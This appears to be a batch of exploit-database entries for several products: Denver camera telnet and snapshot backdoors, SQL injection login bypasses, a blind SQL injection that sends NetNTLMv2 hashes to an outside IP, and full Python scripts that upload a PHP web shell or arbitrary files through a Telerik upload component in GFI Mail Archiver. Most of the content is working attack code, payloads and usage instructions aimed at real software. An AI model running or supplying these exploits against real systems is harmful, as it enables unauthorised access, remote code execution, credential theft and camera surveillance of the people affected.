# Version: Denver SHC-150 (all firmware versions)
# Tested on: Denver SHC-150
Backdoor was found in a Denver SHC-150 Smart Wifi Camera. Maybe other models also have this backdoor too.
So, backdoor is a factory telnet credential - `default`. Just open the telnet connection with the camera on port 23 and enter `default` (yes, on these cameras, telnet service is served on port 23). After this, you'll get a Linux shell. Backdoor allows an attacker to execute commands on OS lever through telnet.
PoC:
```
enty8080@Ivans-Air ~ % telnet 192.168.2.118 23
Trying 192.168.2.118...
Connected to pc192-168-2-118.
Escape character is '^]'.
goke login: default
$ ls /
bin home linuxrc opt run tmp
dev init media proc sbin usr
etc lib mnt root sys var
$ pwd
/home/default
$ exit
Connection closed by foreign host.
enty8080@Ivans-Air ~ %
```
# Exploit Title: Event Registration System with QR Code 1.0 - Authentication Bypass & RCE
# Exploit Author: Javier Olmedo
# Date: 27/07/2021
# Vendor: Sourcecodester
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/event_0.zip
# Affected Version: 1.0
# Category: WebApps
# Platform: PHP
# Tested on: Ubuntu Server & Windows 10 Pro
import os, re, sys, argparse, requests
from termcolor import cprint
def banner():
os.system("cls")
print('''
___________ __
\_ _____/__ __ ____ _____/ |_
| __)_\ \/ // __ \ / \ __\\
| \\\\ /\ ___/| | \ |
/_______ / \_/ \___ >___| /__|
\/ \/ \/
Registration System
--[Authentication Bypass and RCE]--
@jjavierolmedo
''')
def get_args():
parser = argparse.ArgumentParser(description='Event - Authentication Bypass and RCE Exploit')
parser.add_argument('-t', '--target', dest="target", required=True, action='store', help='Target url')
parser.add_argument('-p', '--proxy', dest="proxy", required=False, action='store', help='Use proxy')
args = parser.parse_args()
return args
def auth_bypass(s, proxies, url):
data = {
"username":"admin'#",
"password":""
}
r = s.post(url, data=data, proxies=proxies)
if('{"status":"success"}' in r.text):
cprint("[+] Authenticacion Bypass Success!\n", "green")
return s
else:
cprint("[-] Authenticacion Bypass Error!\n", "red")
sys.exit(0)
def upload_shell(s, proxies, url):
content = "<?php echo '<pre>' . shell_exec($_REQUEST['cmd']) . '</pre>';?>"
file = {
'img':('cmd.php',content)
}
data = {
"name":"Event Registration System with QR Code - PHP",
"short_name":"ERS-QR-PHP",
}
r = s.post(url, files=file, data=data, proxies=proxies)
if('1' in r.text and r.status_code == 200):
cprint("[+] Upload Shell Success!\n", "green")
return s
else:
cprint("[-] Upload Shell Error!\n", "red")
sys.exit(0)
def get_shell_url(s, proxies, url):
r = s.get(url, proxies=proxies)
regex = '\_cmd.php"> (.*?)</a></li>'
shell_name = re.findall(regex, r.text)[0]
url_shell = "http://localhost/event/uploads/{shell_name}?cmd=whoami".format(shell_name=shell_name)
cprint("[+] Use your shell --> {url_shell}\n".format(url_shell=url_shell), "green")
def main():
banner()
args = get_args()
target = args.target
proxies = {'http':'','https':''}
if args.proxy:
proxies = {'http':'{proxy}'.format(proxy=args.proxy),'https':'{proxy}'.format(proxy=args.proxy)}
login_url = target + "/event/classes/Login.php?f=rlogin"
upload_url = target + "/event/classes/SystemSettings.php?f=update_settings"
shell_url = target + "/event/uploads/"
s = requests.Session()
s = auth_bypass(s, proxies, login_url)
s = upload_shell(s, proxies, upload_url)
s = get_shell_url(s, proxies, shell_url)
if __name__ == "__main__":
try:
main()
except KeyboardInterrupt:
cprint("[-] User aborted session\n", "red")
sys.exit(0)
# Disclaimer
# The information contained in this notice is provided without any guarantee of use or otherwise.
# The redistribution of this notice is explicitly permitted for insertion into vulnerability
# databases, provided that it is not modified and due credit is granted to the author.
# The author prohibits the malicious use of the information contained herein and accepts no responsibility.
# All content (c)
# Javier Olmedo
# Exploit Title: Customer Relationship Management System (CRM) 1.0 - Sql Injection Authentication Bypass
# Date: 27/07/2021
# Exploit Author: Shafique_Wasta
# Vendor Homepage: https://www.sourcecodester.com/php/14794/customer-relationship-management-crm-system-php-source-code.html
# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/crm_0.zip
# Version: 1
# Tested on: Windows 10/xampp
# DESCRIPTION #
# Customer relationship management system is vulnerable to Sql Injection Auth Bypass
# Exploit Working:
# 1. Visit on localhostcrm/customer/login.php
# 2. You will see the login panel
# 3. use this payload ( '=' 'or' ) in username and click on signin you will login into the admin account.
# Vulnerable URL :http://localhost/crm/customer/login.php
# Payload: '=' 'or'
# Exploit Title: TripSpark VEO Transportation - 'editOEN' Blind SQL Injection
# Google Dork: inhtml:"Student Busing Information"
# Date: 07/27/2021
# Exploit Author: Sedric Louissaint @L_Kn0w
# Vendor Homepage: https://www.tripspark.com
# Software Document Link: https://www.tripspark.com/resource_files/veo-transportation.pdf
# Version: NovusEDU-2.2.x-XP_BB-20201123-184084 / VEO--20201123-184084
# OS Tested on: Microsoft Windows Server 2012 R2 Standard
# Vender Notified: 01/19/2021
# Confirmed Patch was released : 06/15/2021
# Summary : The POST body parameter editOEN is vulnerable to blind SQL injection. Any user can inject custom SQL commands into the “Student Busing Information” search queries. An exploit is not necessary to take advantage of this vulnerability.
# PoC to trigger DNS/HTTP request and capture NetNTLMv2 hash(if 445 is allowed outbound).
```
POST / HTTP/1.1
Host: vulnerable.site.net
User-Agent: Mozilla/5.0 (x; x; rv:68.0) x/20100101 x/68.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 4700
Origin: vulnerable.site.net
Connection: close
Referer: https:// vulnerable.site.net
Cookie: ASP.NET_SessionId=x
Upgrade-Insecure-Requests: 1
DNT: 1
Sec-GPC: 1
__VIEWSTATE=redacted&__VIEWSTATEGENERATOR=2A5DADC0&__EVENTVALIDATION= redacted&editOEN=123'%3bdeclare%20@q%20varchar(99)%3bset%20@q%3d'%5c%5c52.173.115.212'%2b'%5cfro'%3b%20exec%20master.dbo.xp_dirtree%20@q%3b--%20&cboxMonth=01&cboxDay=01&cboxYear=2001&btnLogin=Submit
```
# Exploit Title: Denver IP Camera SHO-110 - Unauthenticated Snapshot
# Date: 28 July 2021
# Exploit Author: Ivan Nikolsky (enty8080)
# Vendor Homepage: https://denver.eu/products/smart-home-security/denver-sho-110/c-1024/c-1243/p-3826
# Version: Denver SHO-110 (all firmware versions)
# Tested on: Denver SHO-110
Backdoor was found in a Denver SHO-110 IP Camera. Maybe other models also have this backdoor too.
So, the backdoor located in the camera's second http service, allows the attacker to get a snapshot through `/snapshot` endpoint. There are two http services in camera: first - served on port 80, and it requires authentication, and the second - served on port 8001, and it does not require authentication.
It's possible to write a script that will collect snapshots and add them to each other, so the attacker will be able to disclosure the camera stream.
PoC:
http://<host>:8001/snapshot
# Exploit Title: GFI Mail Archiver 15.1 - Telerik UI Component Arbitrary File Upload (Unauthenticated)
# Date: 21/03/2021
# Exploit Author: Amin Bohio
# Original Research & Code By: Paul Taylor / Foregenix Ltd
# Original Exploit: https://github.com/bao7uo/RAU_crypto
# Vendor Homepage: https://www.gfi.com
# Software Link: https://www.gfi.com/products-and-solutions/network-security-solutions/gfi-archiver
# Vulnerable Versions: GFI Mail Archiver <= 15.1
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/unrestricted-file-upload
# Component Advisory: https://www.telerik.com/support/kb/aspnet-ajax/upload-(async)/details/insecure-direct-object-reference
# Tested on: Windows & Linux
# Usage: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p pathonwebserver
#!/usr/bin/python3
# Original Telerik Exploit Author: Paul Taylor / @bao7uo
# https://github.com/bao7uo/RAU_crypto/blob/master/RAU_crypto.py
# Modified by: Amin Bohio
import sys
import base64
import json
import re
import requests
import os
from Crypto.Cipher import AES
from Crypto.Hash import HMAC
from Crypto.Hash import SHA256
from Crypto.Hash import SHA1
from struct import Struct
from operator import xor
from itertools import starmap
import binascii
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# ******************************************
# ******************************************
# ADVANCED_SETTINGS section 1 of 2
# Warning, the below prevents certificate warnings,
# and verify = False (CERT_VERIFY prevents them being verified
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
CERT_VERIFY = False
# ******************************************
# ******************************************
class PBKDF:
def sha1(v):
hl = SHA1.new()
hl.update(v)
return hl.digest()
def derive1(password, salt):
hash = (password + salt).encode()
for i in range(0, 99):
hash = PBKDF.sha1(hash)
result = PBKDF.sha1(hash)
i = 1
while len(result) < 48:
result += PBKDF.sha1(str(i).encode() + hash)
i += 1
return result
def hmacsha1(v):
hl = PBKDF.mac.copy()
hl.update(v)
return bytearray(hl.digest())
def derive2(password, salt):
# Credit: @mitsuhiko https://github.com/mitsuhiko/python-pbkdf2/blob/master/pbkdf2.py
result_length = 48
PBKDF.mac = HMAC.new(bytes(password.encode()), None, SHA1.new())
result = []
for b in range(1, -(-result_length // PBKDF.mac.digest_size) + 1):
rv = u = PBKDF.hmacsha1(salt.encode() + Struct('>i').pack(b))
for i in range(999):
u = PBKDF.hmacsha1(u)
rv = starmap(xor, zip(rv, u))
result.extend(rv)
result = b''.join(map(bytes, [result]))[:result_length]
return result
def derive(type, password,salt = ''.join(chr(i) for i in [58, 84, 91, 25, 10, 34, 29, 68, 60, 88, 44, 51, 1])):
if type == 1:
result = PBKDF.derive1(password, salt)
result = result[0:32] + result[8:16] + result[40:48] # Bizarre hack
elif type == 2:
result = PBKDF.derive2(password, salt)
return result[0:32], result[32:]
class RAUCipher:
# ******************************************
# ******************************************
# ADVANCED_SETTINGS section 2 of 2
# Default settings are for vulnerable versions before 2017 patches with default keys
T_Upload_ConfigurationHashKey = \
"PrivateKeyForHashOfUploadConfiguration" # Default hardcoded key for versions before 2017 patches
HASHKEY = T_Upload_ConfigurationHashKey # or your custom hashkey
T_AsyncUpload_ConfigurationEncryptionKey = \
"PrivateKeyForEncryptionOfRadAsyncUploadConfiguration" # Default hardcoded key for versions before 2017 patches
PASSWORD = T_AsyncUpload_ConfigurationEncryptionKey # or your custom password
# Latest tested version working with this setting: 2018.1.117
# Probably working up to and including 2018.3.910
PBKDF_ALGORITHM = 1
# Earliest tested version working with this setting: 2019.2.514
# Probably introduced 2019.1.115
# PBKDF_ALGORITHM = 2
# ******************************************
# ******************************************
key, iv = PBKDF.derive(PBKDF_ALGORITHM, PASSWORD)
# print(binascii.hexlify(key).decode().upper())
# print(binascii.hexlify(iv).decode().upper())
def encrypt(plaintext):
sys.stderr.write("Encrypting... ")
encoded = ""
for i in plaintext:
encoded = encoded + i + "\x00"
plaintext = encoded + (
chr(16 - (len(encoded) % 16)) *
(16 - (len(encoded) % 16))
)
cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
sys.stderr.write("done\n")
return base64.b64encode(cipher.encrypt(plaintext.encode())).decode()
def decrypt(ciphertext):
sys.stderr.write("Decrypting... ")
ciphertext = base64.b64decode(ciphertext)
cipher = AES.new(RAUCipher.key, AES.MODE_CBC, RAUCipher.iv)
unpad = lambda s: s[0:-ord(chr(s[-1]))]
sys.stderr.write("done\n")
return unpad(cipher.decrypt(ciphertext)).decode()[0::2]
def addHmac(string, Version):
isHmacVersion = False
# "Encrypt-then-MAC" feature introduced in R1 2017
# Required for >= "2017.1.118" (e.g. "2017.1.118", "2017.1.228", "2017.2.503" etc.)
if int(Version[:4]) >= 2017:
isHmacVersion = True
hmac = HMAC.new(
bytes(RAUCipher.HASHKEY.encode()),
string.encode(),
SHA256.new()
)
hmac = base64.b64encode(hmac.digest()).decode()
return string + hmac if isHmacVersion else string
def getProxy(proxy):
return { "http" : proxy, "https" : proxy }
def rauPostData_enc(partA, partB):
data = "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"rauPostData\"\r\n"
data += "\r\n"
data += RAUCipher.encrypt(partA) + "&" + RAUCipher.encrypt(partB) + "\r\n"
return data
def rauPostData_prep(TempTargetFolder, Version):
TargetFolder = RAUCipher.addHmac(
RAUCipher.encrypt(""),
Version
)
TempTargetFolder = RAUCipher.addHmac(
RAUCipher.encrypt(TempTargetFolder),
Version
)
partA = \
'{"TargetFolder":"' + TargetFolder + '","TempTargetFolder":"' + \
TempTargetFolder + \
'","MaxFileSize":0,"TimeToLive":{"Ticks":1440000000000,"Days":0,"Hours":40,"Minutes":0,"Seconds":0,"Milliseconds":0,"TotalDays":1.6666666666666666,"TotalHours":40,"TotalMinutes":2400,"TotalSeconds":144000,"TotalMilliseconds":144000000},"UseApplicationPoolImpersonation":false}'
partB = \
"Telerik.Web.UI.AsyncUploadConfiguration, Telerik.Web.UI, Version=" + \
Version + ", Culture=neutral, PublicKeyToken=121fae78165ba3d4"
return rauPostData_enc(partA, partB)
def payload(TempTargetFolder, Version, payload_filename):
sys.stderr.write("Local file path: " + payload_filename + "\n")
payload_filebasename = os.path.basename(payload_filename)
sys.stderr.write("Destination file name: " + payload_filebasename + "\n")
sys.stderr.write("Destination path: " + TempTargetFolder + "\n")
sys.stderr.write("Version: " + Version + "\n")
sys.stderr.write("Preparing payload... \n")
payload_file = open(payload_filename, "rb")
payload_file_data = payload_file.read()
payload_file.close()
data = rauPostData_prep(TempTargetFolder, Version)
data += "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"file\"; filename=\"blob\"\r\n"
data += "Content-Type: application/octet-stream\r\n"
data += "\r\n"
data += payload_file_data.decode("raw_unicode_escape") + "\r\n"
data += "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"fileName\"\r\n"
data += "\r\n"
data += "RAU_crypto.bypass\r\n"
data += "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"contentType\"\r\n"
data += "\r\n"
data += "text/html\r\n"
data += "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"lastModifiedDate\"\r\n"
data += "\r\n"
data += "2019-01-02T03:04:05.067Z\r\n"
data += "-----------------------------62616f37756f2f\r\n"
data += "Content-Disposition: form-data; name=\"metadata\"\r\n"
data += "\r\n"
data += "{\"TotalChunks\":1,\"ChunkIndex\":0,\"TotalFileSize\":1,\"UploadID\":\"" + \
payload_filebasename + "\"}\r\n"
data += "-----------------------------62616f37756f2f--\r\n"
data += "\r\n"
sys.stderr.write("Payload prep done\n")
return data
def upload(data, url, proxy = False):
global CERT_VERIFY
sys.stderr.write("Preparing to send request to " + url + "\n")
session = requests.Session()
request = requests.Request(
"POST",
url,
data=data
)
request = request.prepare()
request.headers["Content-Type"] = \
"multipart/form-data; " +\
"boundary=---------------------------62616f37756f2f"
response = session.send(request, verify=CERT_VERIFY, proxies = getProxy(proxy))
sys.stderr.write("Request done\n")
return response.text
def decode_rauPostData(rauPostData):
rauPostData = rauPostData.split("&")
rauJSON = RAUCipher.decrypt(rauPostData[0])
decoded = "\nJSON: " + rauJSON + "\n"
TempTargetFolder = json.loads(rauJSON)["TempTargetFolder"]
decoded = decoded + "\nTempTargetFolder = " + \
RAUCipher.decrypt(TempTargetFolder) + "\n"
rauVersion = RAUCipher.decrypt(rauPostData[1])
decoded = decoded + "\nVersion: " + rauVersion + "\n"
return decoded
def mode_decrypt():
# decrypt ciphertext
ciphertext = sys.argv[2]
print("\n" + RAUCipher.decrypt(ciphertext) + "\n")
def mode_Decrypt_rauPostData():
# decrypt rauPostData
rauPostData = sys.argv[2]
print(decode_rauPostData(rauPostData))
def mode_encrypt():
# encrypt plaintext
plaintext = sys.argv[2]
print("\n" + RAUCipher.encrypt(plaintext) + "\n")
def mode_Encrypt_rauPostData():
# encrypt rauPostData based on TempTargetFolder and Version
TempTargetFolder = sys.argv[2]
Version = sys.argv[3]
print(
"rauPostData: " +
rauPostData_prep(TempTargetFolder, Version) +
"\n"
)
def mode_payload():
# generate a payload based on TempTargetFolder, Version and payload file
TempTargetFolder = sys.argv[2]
Version = "2013.1.417.40"
payload_filename = sys.argv[4]
print("Content-Type: multipart/form-data; boundary=---------------------------62616f37756f2f")
print(payload(TempTargetFolder, Version, payload_filename))
def mode_Post(proxy = False):
# generate and upload a payload based on
# TempTargetFolder, Version, payload file and url
Version = "2013.1.417.40"
url = sys.argv[2] + "/Telerik.Web.UI.WebResource.axd?type=rau"
payload_filename = sys.argv[4]
TempTargetFolder = sys.argv[6]
print(upload(payload(TempTargetFolder, Version, payload_filename), url, proxy))
print("\n[+] Check your uploaded file\n");
def mode_help():
print(
"Usage: \nExample1: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Program Files\\GFI\\Archiver\\ASPNET\\UI\\Images\\' \nExample2: python3 gfipwn.py -u http://[host]/Archiver/ -f filetoupload -p 'C:\\Windows\\Temp'")
sys.stderr.write("\n[+] Original Research by Paul Taylor / @bao7uo \n[+] Modified by Amin Bohio\n")
sys.stderr.write("[+] GFI Mail Archiver <= 15.1 - Telerik Arbitrary File Upload\n\n")
if len(sys.argv) < 2:
mode_help()
elif sys.argv[1] == "-u" and len(sys.argv) == 7:
mode_Post()
else:
mode_help()